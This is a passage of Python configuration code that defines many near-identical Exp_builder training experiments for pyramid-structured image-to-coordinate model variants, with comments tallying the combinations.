ch032_1side_3__2side_3__3side_3_4side_1 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_3__2side_3__3side_3_4side_1_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s3__2s3__3s3__4s1") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_3__2side_3__3side_3_4side_1, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_3__2side_3__3side_3_4side_2 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_3__2side_3__3side_3_4side_2_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s3__2s3__3s3__4s2") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_3__2side_3__3side_3_4side_2, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_3__2side_3__3side_3_4side_3 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_3__2side_3__3side_3_4side_3_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s3__2s3__3s3__4s3") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_3__2side_3__3side_3_4side_3, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
# 1 3 6 "10" 15 21 28 36 45 55
# side4 OK 20
ch032_1side_4__2side_1__3side_1_4side_1 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_4__2side_1__3side_1_4side_1_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s4__2s1__3s1__4s1") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_4__2side_1__3side_1_4side_1, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_4__2side_2__3side_1_4side_1 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_4__2side_2__3side_1_4side_1_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s4__2s2__3s1__4s1") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_4__2side_2__3side_1_4side_1, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_4__2side_2__3side_2_4side_1 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_4__2side_2__3side_2_4side_1_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s4__2s2__3s2__4s1") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_4__2side_2__3side_2_4side_1, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_4__2side_2__3side_2_4side_2 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_4__2side_2__3side_2_4side_2_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s4__2s2__3s2__4s2") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_4__2side_2__3side_2_4side_2, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_4__2side_3__3side_1_4side_1 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_4__2side_3__3side_1_4side_1_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s4__2s3__3s1__4s1") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_4__2side_3__3side_1_4side_1, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_4__2side_3__3side_2_4side_1 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_4__2side_3__3side_2_4side_1_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s4__2s3__3s2__4s1") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_4__2side_3__3side_2_4side_1, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_4__2side_3__3side_2_4side_2 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_4__2side_3__3side_2_4side_2_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s4__2s3__3s2__4s2") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_4__2side_3__3side_2_4side_2, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_4__2side_3__3side_3_4side_1 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_4__2side_3__3side_3_4side_1_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s4__2s3__3s3__4s1") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_4__2side_3__3side_3_4side_1, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_4__2side_3__3side_3_4side_2 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_4__2side_3__3side_3_4side_2_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s4__2s3__3s3__4s2") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_4__2side_3__3side_3_4side_2, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_4__2side_3__3side_3_4side_3 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_4__2side_3__3side_3_4side_3_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s4__2s3__3s3__4s3") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_4__2side_3__3side_3_4side_3, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_4__2side_4__3side_1_4side_1 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_4__2side_4__3side_1_4side_1_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s4__2s4__3s1__4s1") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_4__2side_4__3side_1_4side_1, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_4__2side_4__3side_2_4side_1 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_4__2side_4__3side_2_4side_1_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s4__2s4__3s2__4s1") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_4__2side_4__3side_2_4side_1, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_4__2side_4__3side_2_4side_2 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_4__2side_4__3side_2_4side_2_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s4__2s4__3s2__4s2") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_4__2side_4__3side_2_4side_2, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_4__2side_4__3side_3_4side_1 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_4__2side_4__3side_3_4side_1_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s4__2s4__3s3__4s1") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_4__2side_4__3side_3_4side_1, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_4__2side_4__3side_3_4side_2 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_4__2side_4__3side_3_4side_2_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s4__2s4__3s3__4s2") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_4__2side_4__3side_3_4side_2, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_4__2side_4__3side_3_4side_3 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_4__2side_4__3side_3_4side_3_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s4__2s4__3s3__4s3") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_4__2side_4__3side_3_4side_3, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_4__2side_4__3side_4_4side_1 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_4__2side_4__3side_4_4side_1_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s4__2s4__3s4__4s1") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_4__2side_4__3side_4_4side_1, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_4__2side_4__3side_4_4side_2 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_4__2side_4__3side_4_4side_2_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s4__2s4__3s4__4s2") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_4__2side_4__3side_4_4side_2, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_4__2side_4__3side_4_4side_3 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_4__2side_4__3side_4_4side_3_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s4__2s4__3s4__4s3") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_4__2side_4__3side_4_4side_3, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_4__2side_4__3side_4_4side_4 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_4__2side_4__3side_4_4side_4_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s4__2s4__3s4__4s4") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_4__2side_4__3side_4_4side_4, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
# 1 3 6 10 "15" 21 28 36 45 55
# side5 OK 35
ch032_1side_5__2side_1__3side_1_4side_1 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_5__2side_1__3side_1_4side_1_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s5__2s1__3s1__4s1") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_5__2side_1__3side_1_4side_1, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_5__2side_2__3side_1_4side_1 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_5__2side_2__3side_1_4side_1_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s5__2s2__3s1__4s1") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_5__2side_2__3side_1_4side_1, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_5__2side_2__3side_2_4side_1 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_5__2side_2__3side_2_4side_1_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s5__2s2__3s2__4s1") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_5__2side_2__3side_2_4side_1, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_5__2side_2__3side_2_4side_2 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_5__2side_2__3side_2_4side_2_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s5__2s2__3s2__4s2") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_5__2side_2__3side_2_4side_2, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_5__2side_3__3side_1_4side_1 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_5__2side_3__3side_1_4side_1_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s5__2s3__3s1__4s1") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_5__2side_3__3side_1_4side_1, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_5__2side_3__3side_2_4side_1 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_5__2side_3__3side_2_4side_1_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s5__2s3__3s2__4s1") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_5__2side_3__3side_2_4side_1, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_5__2side_3__3side_2_4side_2 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_5__2side_3__3side_2_4side_2_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s5__2s3__3s2__4s2") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_5__2side_3__3side_2_4side_2, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_5__2side_3__3side_3_4side_1 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_5__2side_3__3side_3_4side_1_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s5__2s3__3s3__4s1") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_5__2side_3__3side_3_4side_1, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_5__2side_3__3side_3_4side_2 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_5__2side_3__3side_3_4side_2_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s5__2s3__3s3__4s2") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_5__2side_3__3side_3_4side_2, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_5__2side_3__3side_3_4side_3 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_5__2side_3__3side_3_4side_3_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s5__2s3__3s3__4s3") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_5__2side_3__3side_3_4side_3, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_5__2side_4__3side_1_4side_1 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_5__2side_4__3side_1_4side_1_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s5__2s4__3s1__4s1") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_5__2side_4__3side_1_4side_1, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_5__2side_4__3side_2_4side_1 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_5__2side_4__3side_2_4side_1_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s5__2s4__3s2__4s1") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_5__2side_4__3side_2_4side_1, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_5__2side_4__3side_2_4side_2 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_5__2side_4__3side_2_4side_2_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s5__2s4__3s2__4s2") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_5__2side_4__3side_2_4side_2, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_5__2side_4__3side_3_4side_1 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_5__2side_4__3side_3_4side_1_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s5__2s4__3s3__4s1") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_5__2side_4__3side_3_4side_1, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_5__2side_4__3side_3_4side_2 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_5__2side_4__3side_3_4side_2_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s5__2s4__3s3__4s2") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_5__2side_4__3side_3_4side_2, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_5__2side_4__3side_3_4side_3 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_5__2side_4__3side_3_4side_3_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s5__2s4__3s3__4s3") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_5__2side_4__3side_3_4side_3, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
